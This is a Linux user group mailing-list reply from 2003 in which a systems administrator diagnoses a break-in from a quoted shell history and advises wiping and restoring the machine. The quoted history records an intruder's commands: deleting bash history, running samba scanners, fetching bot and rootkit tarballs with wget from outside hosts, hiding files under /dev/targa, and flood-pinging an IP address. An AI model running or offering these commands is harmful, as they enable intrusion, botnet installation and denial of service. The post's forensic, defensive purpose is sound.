On Wed, 20 Aug 2003, PHPTOm wrote:

> history
> rm -rf .bash_history
> ls -al
> w
> cd /tmp/.cfg/
> cd samba
> ./scan 217 139 97 1
> ./scan 62 139 217 98
> ./serv 67.160.4.66
> ./scan 67 139 160 4
> ./scan 217 139 0 1
> ls -alF
> cat /etc/issue
> tar
> cd /tmp
> cd sh
> ls -alF
> tar -xzvf sh.tgz
> exit
> id
> wget djcc.go.ro/bios.tgz
> tar -xzvf bios.tgz
> tar -xzvf bios.tgz
> ls
> rm -rf bios.tgz
> ls
> ps -aux
> cat /proc/cpuinfo
> exit
> chmod 700 inst
> chmod +x inst
> exit
> mkdir /dev/targa
> cd /dev/targa
> wget mihai-doini.org/bot.tgz
> tar -xzvf bot.tgz
> exit
> ping -s -f 203.144.243.10 65500&
> ping -f -s 203.144.243.10 65500&
> ping -s -f 203.144.243.10 65500&
> ls
> cd /
> ping -s -f 203.144.243.10 65500&
> history | more
> history | vim
> history -w /tmp/hist.txt

looks to me like you got rooted, and i'm sorry to say it but it was by an 
idiot.

wipe the system and restore from a known good backup.

Munir Nassar
Systems Administrator
RedConcepts.NET

_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list